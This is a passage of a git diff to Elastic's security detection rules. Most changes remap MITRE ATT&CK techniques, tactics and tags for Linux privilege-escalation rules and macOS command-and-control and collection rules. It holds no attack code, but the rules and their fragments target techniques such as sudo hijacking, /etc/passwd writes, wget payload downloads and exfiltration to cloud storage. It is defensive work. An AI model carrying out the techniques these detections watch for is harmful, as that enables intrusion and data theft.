Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -112,18 +103,6 @@ host.os.type : "linux" and event.category : "process" and event.action : ("exec" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -138,7 +117,6 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml index c90a6990fbb..832ec099d33 100644 --- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml +++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,9 +114,14 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml index b137cf4d019..edb6791dcf1 100644 --- a/rules/linux/privilege_escalation_sudo_hijacking.toml +++ b/rules/linux/privilege_escalation_sudo_hijacking.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,6 +123,19 @@ file.path in ("/usr/bin/sudo", "/bin/sudo") and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -137,16 +150,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml index a679ec48580..18f20937a5d 100644 --- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml +++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,11 +103,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml index 0035cfea05d..b1539ceef80 100644 --- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -46,15 +46,7 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /root/ -p rwxa -k audit_root" """ severity = "medium" -tags = [ - "Data Source: Auditd Manager", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -109,14 +101,31 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml index 923962a5d96..80df457f7e6 100644 --- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml +++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/22" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,15 +68,7 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /etc/passwd -p wa -k etcpasswd" """ severity = "medium" -tags = [ - "Data Source: Auditd Manager", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -124,14 +116,31 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml index a179911f656..0ecf1365784 100644 --- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,11 +122,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml index 46af7128890..2634a5f0b87 100644 --- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml +++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -116,33 +108,19 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] -id = "T1574.013" -name = "KernelCallbackTable" -reference = "https://attack.mitre.org/techniques/T1574/013/" +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml index 05c5c6f2abf..83b68d9963f 100644 --- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,9 +121,9 @@ process.executable: "/usr/bin/unshare" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml index 298a32c90fc..d33678e809c 100644 --- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml +++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,30 +75,40 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml index 68fa16c9024..ed184cef7fe 100644 --- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml +++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,30 +80,22 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" - - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" - - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" - - [[rule.threat.technique]] - name = "Archive Collected Data" - id = "T1560" - reference = "https://attack.mitre.org/techniques/T1560/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml index 2128dd0828a..d1e76b8309b 100644 --- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml +++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,14 +50,7 @@ This rule flags macOS script interpreters (AppleScript, Node.js, Python) that re risk_score = 47 rule_id = "05f2b649-dc03-4e9a-8c4e-6762469e8249" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "esql" query = ''' FROM logs-endpoint.events.network-* @@ -78,30 +71,30 @@ FROM logs-endpoint.events.network-* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" - [[rule.threat.technique.subtechnique]] - name = "Exfiltration to Cloud Storage" - id = "T1567.002" - reference = "https://attack.mitre.org/techniques/T1567/002/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/macos/command_and_control_executable_download_via_wget.toml b/rules/macos/command_and_control_executable_download_via_wget.toml index 6cc39502d2a..2e29febee49 100644 --- a/rules/macos/command_and_control_executable_download_via_wget.toml +++ b/rules/macos/command_and_control_executable_download_via_wget.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,30 +73,12 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml index 9d68b0d613a..00cfc509299 100644 --- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml +++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -24,15 +24,7 @@ references = [ risk_score = 73 rule_id = "abc7a2be-479e-428b-b0b3-1d22bda46dd9" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" note = """## Triage and analysis @@ -83,40 +75,17 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 0da1e9b9455..1a6d685d035 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ references = [ risk_score = 73 rule_id = "54214c47-be7c-4f6b-8ef2-78832f9f8f42" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" note = """## Triage and analysis @@ -77,25 +70,25 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml index 5241029aa80..219cadf1453 100644 --- a/rules/macos/command_and_control_perl_outbound_network_connection.toml +++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,15 +50,7 @@ This rule detects Perl starting on macOS and then initiating an outbound connect risk_score = 47 rule_id = "aba3bc11-e02f-4a03-8889-d86ea1a44f76" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=30s @@ -74,30 +66,12 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index d6eb9a913f6..75546cf0d82 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,15 +22,7 @@ references = [ risk_score = 73 rule_id = "bba8c7d1-172b-435d-9034-02ed9289c628" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" note = """## Triage and analysis @@ -80,45 +72,17 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index ba69a5cda68..f56d62b60f8 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml +++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,22 +80,22 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference 